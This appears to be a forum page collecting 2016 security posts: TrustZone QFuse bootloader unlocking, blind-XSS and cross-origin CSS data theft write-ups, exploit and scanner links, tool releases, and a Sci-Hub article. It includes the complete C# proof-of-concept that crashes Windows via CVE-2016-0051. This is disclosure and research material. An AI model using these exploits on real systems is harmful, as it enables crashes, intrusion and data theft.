meaningful parts of it from our TrustZone exploit. Analysing the unlocking function reveals a surprisingly simple high-level logic: Unfortunately, these two functions wreak havoc within IDA (which fails to even display a meaningful call-graph for them). Manually analysing the functions reveals that they are in fact quite similar to one another. They both don't contain much logic of their own, but instead they prepare arguments and call the following function: This is a little surprising - instead of handling the logic itself, this function issues an an SMC (Supervisor Mode Call) in order to invoke a TrustZone system-call from aboot itself! (as we've discussed in previous blog posts). In this case, both functions issue an SMC with the request code 0x3F801. Here is the relevant pseudo-code for each of them: At this point we've gleaned all the information we need from aboot, now lets switch over to the TrustZone kernel to find out what this SMC call does. ENTER STAGE LEFT, TRUSTZONE Now that we've established that an SMC call is made with the command-code 0x3F801, we are left with the task of finding this command within the TrustZone kernel. Going over the TrustZone kernel system calls, we arrive at the following entry: This is a huge function which performs widely different tasks based on the first argument supplied, which we'll call the "command code" from now on. It should be noted an additional flag is passed into this system-call indicating whether or not it was called from a "secure" context. This means that if we try invoking it from the Android OS itself, an argument will be passed marking our invocation is insecure, and will prevent us from performing these operations ourselves. Of course, we can get around this limitation using our TrustZone exploit, but we'll go into that later! As we've seen above, this SMC call is triggered twice, using the command codes #1 and #2 (I've annotated the functions below to improve readability): In short, we can see both commands are used to read and write (respectively) values from something called a "QFuse". QFUSES Much like a real-life fuse, a QFuse is a hardware component which facilitates a "one-time-writeable" piece of memory. Each fuse represents a single bit; fuses which are in-tact represent the bit zero, and "blown" fuses represent the bit one. However, as the name suggests, this operation is irreversible - once a fuse is blown it cannot be "un-blown". Each SoC has it's own arrangement of QFuses, each with it's own unique purpose. Some fuses are already blown when a device is shipped, but others can be blown depending on the user's actions in order to change the way a specific device feature operates. Unfortunately, the information regarding the role of each fuse is not public, and we are therefore left with the single option of reversing the various software components to try and deduce their role. In our case, we call a specific function in order to decide which fuse we are going to read and write: Since we call this function with the second syscall argument, in our case "4", this means we will operate on the fuse at address 0xFC4B86E8. PUTTING IT ALL TOGETHER Now that we understand the aboot and the TrustZone logic, we can put them together to get the full flow: First, aboot calls SMC 0x3F801 with command-code #1 This causes the TrustZone kernel to read and return the QFuse at address 0xFC4B86E8 Then, iff the first bit in the QFuse is disabled, aboot calls SMC 0x3F801 once more, this time with command-code #2 This causes the TrustZone kernel to write the value 1 to the LSB of the aforementioned QFuse. Turns out to be very simple after all - we just need to set a single bit in a single QFuse, and the bootloader will be considered unlocked. But how can QFuses be written? DIY QFUSES Luckily the TrustZone kernel exposes a pair of system-call which allow us to read and write a restricted set of QFuses - tzbsp_qfprom_read_row and tzbsp_qfprom_write_row, respectively. If we can lift those restrictions using our TrustZone exploit, we should be able to use this API in order to blow the wanted QFuse. Lets take a look at these restrictions within the tzbsp_qfprom_write_row system-call: So first, there's a DWORD at 0xFE823D5C which must be set to zero in order for the function's logic to continue. Normally this flag is in fact set to one, thus preventing the usage of the QFuse calls, but we can easily enough overwrite the flag using the TrustZone exploit. Then, there's an additional function called, which is used to make sure that the ranges of fuses being written are "allowed": As we can see, this function goes over a static list of pairs, each denoting the start and end address of the allowed QFuses. This means that in order to pass this check, we can overwrite this static list to include all QFuses (setting the start address to zero and the end address to the maximal QFuse relative address - 0xFFFF). TRYING IT OUT Now that we have everything figured out, it's time to try it out ourselves! I've written some code which does the following: Achieves code-execution within TrustZone Disables the QFuse protections Writes the LSB QFuse in QFuse 0xFC4B86E8 I encourage you to check out the code here: https://github.com/laginimaineb/Alohamora Have fun! FINAL THOUGHTS In this blog post we went over the flow controlled by a single QFuse. But, as you can probably guess, there are many different interesting QFuses out there, waiting to be discovered. On the one hand, blowing a fuse is really "dangerous" - making one small mistake can permanently brick you device. On the other hand, some fuses might facilitate a special set of features that we would like to enable. One such example is the "engineering" fuse; this fuse is mentioned throughout the aboot image, and can be used to enable an amazing range of capabilities such as skipping secure boot, loading unsigned peripheral images, having an unsigned GPT, and much more. However, this fuse is blown in all consumer devices, marking the device as a "non-engineer" device, and disabling these features. But who knows, maybe there are other fuses which are just as important, which have not yet been discovered... Sursa: http://bits-please.blogspot.in/2016/02/unlocking-motorola-bootloader.html

The Research Pirates of the Dark Web After getting shut down late last year, a website that allows free access to paywalled academic papers has sprung back up in a shadowy corner of the Internet. KAVEH WADDELL FEB 9, 2016 There’s a battle raging over whether academic research should be free, and it’s overflowing into the dark web. Most modern scholarly work remains locked behind paywalls, and unless your computer is on the network of a university with an expensive subscription, you have to pay a fee, often around 30 dollars, to access each paper. Many scholars say this system makes publishers rich—Elsevier, a company that controls access to more than 2,000 journals, has a market capitalization about equal to that of Delta Airlines—but does not benefit the academics that conducted the research, or the public at large. Others worry that free academic journals would have a hard time upholding the rigorous standards and peer reviews that the most prestigious paid journals are famous for. Some years ago, a university student in Kazakhstan took it upon herself to set free the vast trove of paywalled academic research. That student, Alexandra Elbakyan, developed Sci-Hub, an online tool that allows users to easily download paywalled papers for free. Sci-Hub uses university networks to access subscription-only academic papers, generally without the knowledge of the academic institutions. When a user asks Sci-Hub to access a paid article, the service will download it from a university that subscribes to the database that owns it. As it delivers the user a pdf of the requested article, it also saves a copy on its own server, so that next time someone requests the paper, they can download the cached version. Unsurprisingly, Elbakyan’s project has drawn the ire of publishers. Last year, Elsevier sued Sci-Hub and an associated website called Library Genesis for violating its copyright. The two websites “operate an international network of piracy and copyright infringement by circumventing legal and authorized means of access to the ScienceDirect database,” Elsevier’s lawyers wrote in a court filing, referring to the company’s subscription database. A judge for the New York Southern District Court ruled in favor of the publisher, and Sci-Hub’s domain, sci-hub.org, was shut down. Soon, the service popped up again under a different domain. But even if the new domain gets shut down, too, Sci-Hub will still be accessible on the dark web, a part of the Internet often associated with drugs, weapons, and child porn. Like its seedy dark-web neighbors, the Sci-Hub site is accessible only through Tor, a network of computers that passes web requests through a randomized series of servers in order to preserve visitors’ anonymity. Illegal activity thrives on this part of the Internet, partly because its contents aren’t visible to search engines like Google. The Tor network makes it very difficult to know where an offending server is, allowing sites like Silk Road, a prominent drug marketplace, to survive for years. (Silk Road was finally shut down in 2013 and its creator, Ross Ulbricht, was sentenced to life in prison.) But the investigation that took down the Silk Road took up countless government resources. It’s unlikely new Sci-Hub website would attract the same amount of negative attention, so the website is likely safe behind the many layers of encryption that protect sites on the dark web. So why go through all this trouble to provide access to pirated academic research? In a letter submitted to the New York district court where she was being sued, Elbakyan said her experience as a student in Kazakhstan drove her to set up the website. Paying upwards of 30 dollars to access a paper is “insane,” she wrote, when researchers regularly need to access tens or even hundreds of articles. Elbakyan says free access to academic research also helps promote researchers’ independence. “Today, subscription prices are very high; an individual person cannot pay them,” she wrote to me in an email. “You need to join one of the few available research institutions, and for that you need to conform to … standards that suppress creativity.” Websites like Sci-Hub and Library Genesis have a lot of support from the academic community, including from the authors whose work is being traded for free in shadowy corners of the Internet. In 2012, during a large-scale academic boycott of Elsevier, even well-endowed Harvard University announced it was having trouble paying large publishers’ annual fees. “We faculty do the research, write the papers, referee papers by other researchers, serve on editorial boards, all of it for free … and then we buy back the results of our labour at outrageous prices,” the former director of the university’s library told The Guardian. Well-organized boycotts and open-access movements continue to flourish in academia. After Elsevier’s lawsuit against Sci-Hub succeeded late last year, a group of researchers, writers, and artists created a website with an open letter in support of Sci-Hub. Likening Elsevier to the the greedy businessman in Antoine de Saint-Exupéry’s The Little Prince, a character who spends all his time mindlessly accumulating a stockpile of stars for profit, the group wrote that the lawsuit was a “big blow” to researchers around the world. “The system is broken,” the essay read. “It devalues us, authors, editors, and readers alike. It parasites on our labor, it thwarts our service to the public, it denies us access.” There will always be techniques for accessing paywalled research for free, even without services like Sci-Hub. Some of them are much less complex than Elbakyan’s website: Researchers and scholars often use the hashtag #icanhazpdfon Twitter to ask fellow academics for paywalled articles. (There’s even been scholarly work published that analyzes the phenomenon—appropriately, the research is free online.) But Sci-Hub’s ingenious methods automate the process, cut out middle men on Twitter, and don’t advertise the request for, essentially, pirated research. And Elbakyan says her website’s presence on the dark web will help keep it accessible even if legal action dismantles Sci-Hub’s new home on the easily accessible surface web. Sursa: http://www.theatlantic.com/technology/archive/2016/02/the-research-pirates-of-the-dark-web/461829/

cve-2014-7920-7921 Exploit code for CVE-2014-7920 and CVE-2014-7921 - code-exec in mediaserver up to Android 5.1 The symbols in this exploit are for Android 4.3, for can be adapted to any version up to Android 5.1 Link: https://github.com/laginimaineb/cve-2014-7920-7921

Hackers aren't smart -- people are stupid The cliche is that hackers are geniuses. That's not true, hackers are generally stupid. The top three hacking problems for the last 10 years are "phishing", "password reuse", and "SQL injection". These problems are extremely simple, as measured by the fact that teenagers are able to exploit them. Yet they persist because, unless someone is interested in hacking, they are unable to learn them. They ignore important details. They fail at grasping the core concept. Phishing Phishing happens because the hacker forges email from someone you know and trust, such as your bank. It appears nearly indistinguishable from real email that your bank might send. To be fair, good phishing attacks can fool even the experts. But when read advice from "experts", it's often phrased as "Don't open emails from people you don't know". No, no, no. The problem is that emails appear to come from people you do trust. This advice demonstrates a lack of understanding of the core concept. What's going on here is human instinct. We naturally distrust strangers, and we teach our children to distrust strangers.Therefore, this advice is wired into our brains. Whatever advice we hear from experts, we are likely to translate it into "don't trust strangers" anyway. We have a second instinct of giving advice. We want to tell people "just do this one thing", wrapping up the problem in one nice package. But these instincts war with the core concept, "phishing emails appear to come from those you trust". Thus, average users continue to open emails with reckless abandon, because the core concept never gets through. Password reuse Similarly there is today's gem from the Sydney Morning Herald: When you create accounts on major websites, they frequently require you to "choose 8 letters with upper case, number, and symbol". Therefore, you assume this is some sort of general security advice to protect your account. It's not, not really. Instead, it's a technical detail related to a second layer of defense. In the unlikely event that hackers break into the website, they'll be able able to get the encrypted version of everyone's password. They use password crackers to guess passwords at a rate of a billion-per-second. Easily guessed passwords will get cracked in a fraction of a second, but hard to guess passwords are essentially uncrackable. But it's a detail that only matters once the website has already been hacked. The real problem with passwords is password reuse. People use the same password for unimportant websites, like http://flyfishing.com, as they use for important sites, likehttp://chase.com or their email. Simple hobbyist sites are easily hacked, allowing hackers to download all the email addresses and passwords. Hackers then run tools to automate trying out that combination on sites like Amazon, Gmail, and banks, hoping for a match. Therefore, the correct advice is "don't reuse passwords on important accounts", such as your business accounts and email account (remember: your email account can reset any other password). In other words, the correct advice is the very opposite what the Sydney Morning Herald suggested. The problem here is human nature. We see this requirement ("upper-case and number/symbol") a lot, so we gravitate toward that. It also appeals to our sense of justice, as if people deserve to get hacked for the moral weakness of choosing simple passwords. Thus, we gravitate toward this issue. At the same time, we ignore password reuse, because it's more subtle. Thus we get bad advice from "experts" like the Sydney Morning Herald, advising people to do the very opposite of what they should be doing. This article was passed around a lot today in the cybersec community. We all had a good laugh. SQL injection SQL injection is not an issue for users, but for programmers. However, it shares the same problem that it's extremely simple, yet human nature prevents it from being solved. Most websites are built the same way, with a web server front-end, and a databaseback-end. The web server takes user interactions with the site and converts them into a database query. What you do with a website is data, but the database query is code. Normally, data and code are unrelated and never get mixed up. However, since the website generates code based on data, it's easy to confuse the two. What SQL injection is that the user (the hacker) sends data to a website frontend that actually contains code that causes the backend to do something. That something can be to dump all the credit card numbers, or create an account that allows the hacker to break in. In other words, SQL injection is when websites fail to understand the differences between these two sentences: Susie said "you owe me $10". Susie said you owe me $10. It's best illustrated in the following comic: The core concept is rather easy: don't mix code with data, or as the comic phrases it "sanitize your database inputs". Yet the problem persists because programmers fail to grasp the core concept. The reason is largely that professors fail to understand the core concept. SQL injection has been the most popular hacker attack for more than a decade, but most professors are even older than that. Thus, they continue to teach website design ignoring this problem. The textbooks they use don't eve mention it. Conclusion These are the three most common hacker exploits on the Internet. Teenagers interested in hack learn how to exploit them within a few hours. Yet, the continue to be unsolved because if you aren't interested in the issues, you fail to grasp the core concept. The concept "phishing comes from people you know" to "don't trust emails from strangers". The core concept of hackers exploiting password reuse becomes "choose strong passwords". The core concept of mixing code with data simply gets ignored by programmers. And the problem here isn't just the average person unwilling or unable to grasp the core concept. Instead, confusion is aided by people who are supposed to be trustworthy, like the Sydney Morning Herald, or your college professor. I know it's condescending and rude to point out that "hacking happens because people are stupid", but that's really the problem. I don't know how to point this out in a less rude manner. That's why most hacking persists. By Robert Graham Sursa: http://blog.erratasec.com/2016/02/hackers-arent-smart-people-are-stupid.html#.VrxVCvJ96Uk

Exista per categorie. Vezi dreapta jos cand intri pe o categorie. Nu exista pentru tot forumul, le-am zis dar o sa dureze pana o sa bage, daca o sa bage. Ma gandeam sa fac eu, dar chiar nu am timp si chef...

htop - an interactive process viewer for Unix This is htop, an interactive process viewer for Unix systems. It is a text-mode application (for console or X terminals) and requires ncurses. What's new in htop 2.0 Since version 2.0, htop is now cross-platform! Check out the video and slides of my presentation at FOSDEM 2016 about how this came to be. This release includes code supporting Linux, FreeBSD, OpenBSD and Mac OS X. There are also, of course, some new features: If you're using NCurses 6, htop will also support your mouse wheel for scrolling. Moving meters and columns around in the setup screen is a lot more comfortable now. You can now press "e" to see the set of environment variables for a process. The "graph" mode for meters was revamped, inspired by James Hall's vtop. ...And of course, lots of other tweaks and fixes! Link: http://hisham.hm/htop/

YASUO Description Yasuo is a ruby script that scans for vulnerable 3rd-party web applications. While working on a network security assessment (internal, external, redteam gigs etc.), we often come across vulnerable 3rd-party web applications or web front-ends that allow us to compromise the remote server by exploiting publicly known vulnerabilities. Some of the common & favorite applications are Apache Tomcat administrative interface, JBoss jmx-console, Hudson Jenkins and so on. If you search through Exploit-db, there are over 10,000 remotely exploitable vulnerabilities that exist in tons of web applications/front-ends and could allow an attacker to completely compromise the back-end server. These vulnerabilities range from RCE to malicious file uploads to SQL injection to RFI/LFI etc. Yasuo is built to quickly scan the network for such vulnerable applications thus serving pwnable targets on a silver platter. Link: https://github.com/0xsauby/yasuo

Viper Frank4DD, @ May 2000 Viper is a prute force UNIX-style password cracker for passwords encrypt with crypt. It has been developed from Hale's viper 1.4 Perl program. While there are other more powerful crack programs out, this one is about studying the safety of passwords while hardware speed is increasing drastically. If I remember right, I read that on a PDP-11 the password generation took 30 seconds. Now we can do more then 230.000 generations per second on a single CPU core of a single system, increasing speed by a factor of several million. Still, there is some time to go for a 8-character password on full keyspace, see keyspace.txt. Originally, the ufc-crypt implementation seemed to be the fastest crypt function around, using it made porting the program to different platforms easy. Viper runs under Linux, Solaris, HPUX and DOS/Windows. Link: https://github.com/fm4dd/viper?platform=hootsuite

Create Your Own CMD.XLS For several years now I’ve been using my modified cmd.exe from Excel. I’m not releasing this spreadsheet with my cmd code, but I release the VBA code. You can create your own spreadsheet (or Word document) with this VBA file. If you don’t know how, here’s a video: Sursa: http://blog.didierstevens.com/2016/02/10/create-your-own-cmd-xls/

/* Source: https://github.com/koczkatamas/CVE-2016-0051 Proof-of-concept BSoD (Blue Screen of Death) code for CVE-2016-0051 (MS-016). Full Proof of Concept: https://github.com/koczkatamas/CVE-2016-0051/archive/master.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39432.zip */ using System; using System.IO; using System.Linq; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Text; using System.Threading; namespace BSoD { class Program { static void StartFakeWebDavServer(int port) { new Thread(() => { var server = new TcpListener(IPAddress.Loopback, port); server.Start(); while (true) { using (var client = server.AcceptTcpClient()) using (var stream = client.GetStream()) using (var reader = new StreamReader(stream, Encoding.GetEncoding("iso-8859-1"))) using (var writer = new StreamWriter(stream, Encoding.GetEncoding("iso-8859-1")) { AutoFlush = true }) { Console.WriteLine(" =============== BEGIN REQUEST =============== "); Func<string> rl = () => { var line = reader.ReadLine(); Console.WriteLine("< " + line); return line; }; Action<string> wl = outData => { Console.WriteLine(String.Join("\n", outData.Split('\n').Select(x => "> " + x))); writer.Write(outData); }; var header = rl().Split(' '); while (!string.IsNullOrWhiteSpace(rl())) { } if (header[0] == "OPTIONS") wl("HTTP/1.1 200 OK\r\nMS-Author-Via: DAV\r\nDAV: 1,2,1#extend\r\nAllow: OPTIONS,GET,HEAD,PROPFIND\r\n\r\n"); else if (header[0] == "PROPFIND") { var body = String.Format(@" <?xml version=""1.0"" encoding=""UTF-8""?> <D:multistatus xmlns:D=""DAV:""> <D:response> <D:href>{0}</D:href> <D:propstat> <D:prop> <D:creationdate>{1:s}Z</D:creationdate> <D:getcontentlength>{3}</D:getcontentlength> <D:getcontenttype>{4}</D:getcontenttype> <D:getetag>{5}</D:getetag> <D:getlastmodified>{6:R}</D:getlastmodified> <D:resourcetype>{8}</D:resourcetype> <D:supportedlock></D:supportedlock> <D:ishidden>{7}</D:ishidden> </D:prop> <D:status>HTTP/1.1 200 OK</D:status> </D:propstat> </D:response> </D:multistatus>", header[1], DateTime.UtcNow.ToUniversalTime(), "", "0", "", "", DateTime.UtcNow.ToUniversalTime(), 0, header[1].Contains("file") ? "" : "<D:collection></D:collection>").Trim(); wl("HTTP/1.1 207 Multi-Status\r\nMS-Author-Via: DAV\r\nDAV: 1,2,1#extend\r\nContent-Length: " + body.Length + "\r\nContent-Type: text/xml\r\n\r\n" + body); } else wl("HTTP/1.1 500 Internal Server Error\r\n\r\n"); Console.WriteLine(" =============== END REQUEST =============== "); } } }) { IsBackground = true, Name = "WebDAV server thread" }.Start(); } [StructLayout(LayoutKind.Sequential)] private class NETRESOURCE { public uint dwScope = 0; public uint dwType = 0; public uint dwDisplayType = 0; public uint dwUsage = 0; public string lpLocalName = null; public string lpRemoteName = null; public string lpComment = null; public string lpProvider = null; } [DllImport("mpr.dll")] private static extern int WNetAddConnection2(NETRESOURCE lpNetResource, string lpPassword, string lpUsername, int dwFlags); [DllImport("Advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern int DuplicateEncryptionInfoFile(string srcFileName, string dstFileName, uint dwCreationDistribution, uint dwAttributes, IntPtr lpSecurityAttributes); public static void Main(string[] args) { var p = new Random().Next(1024, 65535); StartFakeWebDavServer(p); var addConnectionResult = WNetAddConnection2(new NETRESOURCE() { lpRemoteName = @"\\127.0.0.1@" + p + @"\folder\" }, null, null, 0); Console.WriteLine("WNetAddConnection2 = " + addConnectionResult); var duplicateEncryptionInfoResult = DuplicateEncryptionInfoFile(@"\\127.0.0.1@" + p + @"\folder\file", "x", 2, 128, IntPtr.Zero); Console.WriteLine("DuplicateEncryptionInfoFile = " + duplicateEncryptionInfoResult); Console.WriteLine("BSoD did not happen."); Console.ReadLine(); } } } Sursa: https://www.exploit-db.com/exploits/39432/

Vezi stanga. https://rstforums.com/forum/profile/19350-garryone/reputation/?type=forums_topic_post&change_section=1

Vezi in stanga.

Instaleaza pe server un server de mail. Acel "smtp" dupa care sunt unii obsedati si nici nu stiu ce este.

https://rstforums.com/forum/notifications/options/

Exploiting a blind cross-site scripting vulnerability A cross-site scripting vulnerability (also known as XSS) is a vulnerability that allows hackers to execute malicious scripts into a web application. Looking at the statistics of Google’s vulnerability reward program -Google rewards hackers for vulnerabilities they report to them- more than 65% of the vulnerabilities reported are XSS vulnerabilities. The basic principle of an XSS is that you insert a payload which then reflects back to you on the same page, for example on your profile page. A blind XSS goes further than that. A blind XSS doesn’t reflect back to you, but it reflects back to systems like a CRM or a Server Administration panel. Since these systems are mostly designed to be used internally, they are not always developed with security in mind. This “No one can reach it anyway” approach, can for a hacker be a ticket to the “holy grail”. If an attacker wants to exploit a blind XSS he needs to do three things: Detect the vulnerability. Wait till someone opens the payload on an internal system. Exploit it. This requires a couple of tricks. First you need to write a script that calls back to you when your payload is executed. This can be accomplished fairly easily. For example the script given below will ping the “log server” with the given domain-name and then execute the JavaScript parsed back by that log server onto the vulnerable web application. Doing this you can set-up an interactive shell. This is an example code, for this to work you also need a working back-end to interact with the script. By using JavaScript modules like for instance html2canvas it’s incredible easy to create screenshots of the victims application which could give a lot of insight about how the targeted application works and how you could exploit it further. Secondly, you likely want to view the HTML of the targeted page, and by using document.documentElement.innerHTML it’s possible to get the content of the entire page. 192.168.1.10 is open. As the XSS is likely executed on a device somewhere in a network, you could also use JavaScript to scan that infrastructure. You could run for example an IP range discovery or a port scan. So, testing your internal (web)applications for vulnerabilities is also very important, even if they are not “reachable” from the outside. Because, as you can see above, they may be reachable anyway. It just takes a little bit more effort. - Olivier Beg Sursa: http://blog.zerocopter.com/post/138552423798/exploiting-a-blind-cross-site-scripting

NetworkMiner 2.0 Released I'm proud to announce the release of NetworkMiner2.0 today! There are several longed-for features that are part of this major release, such as: SMB/CIFS parser now supports file extraction from SMB write operations. Added parser for SMB2 protocol (read and write). Additional IEC-104 commands implemented. Added Modbus/TCP parser (as requested by attendees at 4SICS 2014). Improved SMTP parser. Improved FTP parser. Improved DNS parser. GUI flickering is heavily reduced when loading PCAP files or doing live sniffing. Extraction of web server favicon images (shown in Hosts tab). Added "Keyword filter" to several tabs (see more details below). Image: NetworkMiner 2.0 showing hosts in nitroba.pcap from Digital Corpora For those not familiar with NetworkMiner, here's a short summary: Keyword Filtering Users of NetworkMiner sometimes run into a needle-in-the-haystack problem when trying to find some specific entry in the Files, Parameters or DNS tab. The technique most analysts have been using so far is to sort the data based a column of interest (by clicking the column header) and then scroll down to the row they are looking for. This method isn't optimal, which is why several users have requested support for keyword filtering. I've personally received several of these requests when teaching my Networks Forensics class. I'm therefore happy to say that version 2.0 of NetworkMiner has a built-in filtering capability for the data displayed in the following tabs: Files Parameters DNS Messages Sessions Image: Parameters tab with filter “user-agent” (case insensitive) The filter allows rows to be filtered based on one or several keywords. The entered keywords are matched against all text in all columns of the tab. A drop-down menu in the filter bar allows the analyst to chose “Exact Phrase”, “All Words” or “Any Word” as search criteria for the entered keywords. More Data in the Parameters Tab We have previously held back on what data we add to the Parameters tab. However, now with the filtering feature in place, we decided to add a lot more information to the Parameters list. Some of the new parameter types available in version 2.0 are: HTTP request methods HTTP URI's HTTP response status codes HTTP headers SMB Tree Connect AndX Request (attempts to connect to a named file share) SMB NT Create AndX Request (mapping of filename to file handle ID) SMB2 Connect Requests (attempts to connect to a named file share) SMB2 File ID (mapping of filename to file handle ID) SMB2 file timestamps (Created, Modified and Accessed). Image: SMB2 file timestamps shown in Parameters tab A Warning to Malware Analysts NetworkMiner has previously appended the “.octet-stream” or “x-msdos-program” extension to all binary files being downloaded over HTTP (since those are the MIME types used for Windows executables). As of version 2.0, however, files named {something}.exe will not be renamed this way. This means that there is now a risk of accidental execution of such files, for example if the user right-clicks an .exe file in NetworkMiner and selects “Open File”. If you analyze PCAP files that might contain malware, then our recommendation is to perform the analysis on some other operating system than Windows. NetworkMiner runs fine on Linux as well as Mac OS X. NetworkMiner Professional On top of the updates provided in the free version of NetworkMiner we have added a few additional useful features to NetworkMiner Professional. The new features in the Pro version include: Advanced OS fingerprinting. Identifies a great range of operating systems and device types (including Apple iOS, Android and many others) based on DHCP traffic. Web Browsing Analysis. A new GUI tab called "Browsers" has been added, which shows what URLs each unique browser has visited. More details on this feature will be released shortly in a separate blog post. User Settings. Settings in GUI can now be saved to make them persistent between executions. Better Export Logs. The CSV format used for exporting data has been improved, we have also added support for XML formatted data export. Image: Andoid, Apple iOS, Mac OS and Windows detected in captured DHCP traffic from a WiFi network. Defang Executables Remember the warning about .exe files downloaded over HTTP no longer get the “.octet-stream” extension? To counter the risk of accidental execution of malware we've added a defang feature to NetworkMiner Professional. When enabled, this feature will rename files like “malware.exe” to “malware.exe_” in order to prevent execution. It is not only .exe files being renamed. At the moment the following file extensions are defanged by appending “_” to the extension: The defang feature renames files regardless if they were transmitted over HTTP, FTP, TFTP, SMB, SMB2, SMTP or any other protocol supported by NetworkMiner. Please note that the defang feature is turned off by default. So if you wanna protect yourself from accidental execution, make sure to enable this feature in the NetworkMiner Settings (available under Tools > Settings). Credits There are many people who have provided feedback and ideas for improvements that are now part of NetworkMiner 2.0. I would especially like to thank Eric Kollmann (author of Satori) for his impressive ability to find bugs in beta releases. I would also like to thank Ulf Skoglund, Dmitry Shchemelev, @xredumb, Sabin and Andrew Brantfor their feedback on improvements in DNS, TCP, HTTP and SMTP parsing. Finally, I wanna give a shout-out to Steffen Thorkildsen for spawning the idea for a browser tracking feature. Sursa: http://www.netresec.com/?page=Blog&month=2016-02&post=NetworkMiner-2-0-Released

Cross-Origin CSS Attacks Revisited (feat. UTF-16) February 10, 2016 | Tags: Bug Bounty, CSS Prologue If you are a boring person like me and read specs in spare time, you may have come across this potential attack described by the CSP 2 spec: Lax Parsing Unlike JavaScript which stops parsing when a syntax error is encountered, CSS parsing rules allow to ignore certain illegal parts in quirks mode. How This Was Abused Back in 2009, Chris Evans discovered that such behavior can lead to cross-domain theft. The way it worked is to find a page which reflects GET paremeters, inject crafted payload and import it in an attacker controlled page. Since a picture is worth a thousand words, here is a picture which depicts the attack: In short, attackers inject two strings, pre-string ({}#f{font-family:') and post-string (';}) that surround the secret data. The junk is ignored while the payload then turns the secret data into a CSS property (font-family in this case), and can be revealed in computed style. Note that the injected strings do not contain harmful characters (angle brackets) so they will generally not be escaped. Ultimately this attack can lead to data exfiltration. Since cookie is sent along the request, the stolen data can contain a CSRF token or personal information. There are however certain restrictions of this attack: The extracted data needs to sit in between the pre-string and post-string. Also having 2 injection points is not uncommon yet not very usual The extracted data cannot contain both single and double quotes at the same time (because the data needs to be treated as a CSS string) The extracted data cannot contain line breaks (CSS string does not support multiple lines) These conditions are not easy to meet, especially the "no line breaks" requirement as they are inevitable in modern coding style. How It ended Internet Explorer and Firefox disabled the ability to import CSS with incorrect MIME type (text/css) cross-origin. Webkit-based browsers on the other hand, used strict parsing (stop parsing when error encountered) for cross-origin CSS for the sake of compatibility. The approach Webkit adopted is also suggested by CSP 2: Thinking Out Of The Box The suggested defense looks like a perfect balance: It resolves the issue while not breaking old websites which use incorrect MIME type for CSS. Well, it surely does not break those websites, but it is not unbreakable either. It assumes that it is unlikely for attackers to influence a document in a way such that the content is a valid CSS. What I am going to tell you is that we can indeed make a document syntactically valid with a little help from charset. Manipulating Charest The CSS spec defines the precedence of what charset should be used for a CSS: BOM Content-Type header (e.g. Content-Type: text/html; charset=utf-8) Environment encoding (the charset attribute of <link>) If a page does not specific BOM or charset on Content-Type, the encoding decision will fallback to environemnt encoding which we can control. BOM is not an issue since it is discouraged according to the Unicode standard and nobody uses it. Content-Type header is a bit tough because modern frameworks have it set by default, though it is not uncommon to see a page without charset specified on Content-Type due to verious reasons. Facebook is an example which does not have charset set through Content-Type but instead relies on <meta charset>. Fiddling CSS Syntax Now to the most interesting part: forcing a document to be a valid CSS. Before that, we need to understand the syntax. A CSS is a stylesheet. It has to start with @-rules or rulesets. Since It is nearly impossible for a document to start with @ or pull it out of thin air, we are only interested in ruleset. A rule is essentially selector + block. Selectors have different types but most of them contain identifier. According to the spec, identifiers can contain only the characters [a-zA-Z0-9] and ISO 10646 characters U+00A0 and higher, plus the hyphen (-) and the underscore (_). Apparently, CSS supports wide range (U+00A0 ~ U+10FFFFF) of Unicode characters to be valid identifiers, but penalizes ASCII characters as a single bracket or quote which is common is a HTML document is treated invalid. How UTF-16 Comes Into Play Unlike most of the charset, UTF-16 always maps 2 or more bytes into 1 character, even for ASCII. Now you start seeing the pattern: we can tell the parser that the document should be decoded as UTF-16, and all in a sudden the whole document becomes a valid identifier! This is because the transformation "eliminates" all ASCII characters, including line breaks and quotes (a NUL byte is needed for padding for an acutal ASCII character in UTF-16). We then add a wildcard selector so that the following rule matches an element. So we now have the selector settled, the parser continues to receive block. At this point we just need to find an injection point and make a block to complete our payload. For declaration, we need a property that accepts arbitrary string value so that we can steal the secret data. font-family is the perfect choice as it supports not only string but also identifier. Let's see what we've got so far: Identifier(junk), * { font-family: Identifier(secret data) And that's it! ...Wait, where is the closing brace (})? Actually we can ignore it and it still remains valid. As per spec, when the parser reaches EOF (End-of-File), theblock will be closed automatically. Taking advantage of it, we only need one injection point to perform the attack. Nosniff? You may wonder: isn't X-Content-Type-Options exactly there to prevent such attack? Unfortunately, for some reasons Webkit does not honor this header when importing CSS. In other word, having X-Content-Type-Options: nosniff has no effect when the document is being treated as an external CSS. Limitation To sum up, the attack works when the following conditions are met: The target does not have charset set in the Content-Type header The injection point does not sanitize NUL byte Compared with the original attack, this possibility to perform the attack is tremendously increased. PoC The following PoC will demonstrate how this attack can steal cookies of victim's from phpinfo. Phpinfo is a common information leakage which contains limited server information and HTTP request information. Normally it is immune from XSS, with this attack we can exfiltrate httpOnly cookies from victim since it meets all the attack requirement (i.e. no charset on header and accept NUL byte). PoC (Chrome 43, Safari 8 or iOS 8): http://innerht.ml/csstheft/phpinfo.html Although patched in modern browsers, I reckon there are still some homemade browsers which are vulnerable. Further Reading There is also a similar attack for its counterpart JavaScript called XSSI First-Party-Only Cookies is a proposed solution which prevents cookies being sent off in a third-party context Entry Point Regulation is an alternative which restricts documents being used as external resouces, although IMO the manifest is rather verbose References Original Report to Chromium CSS railway diagrams Sursa: http://blog.innerht.ml/cross-origin-css-attacks-revisited-feat-utf-16/

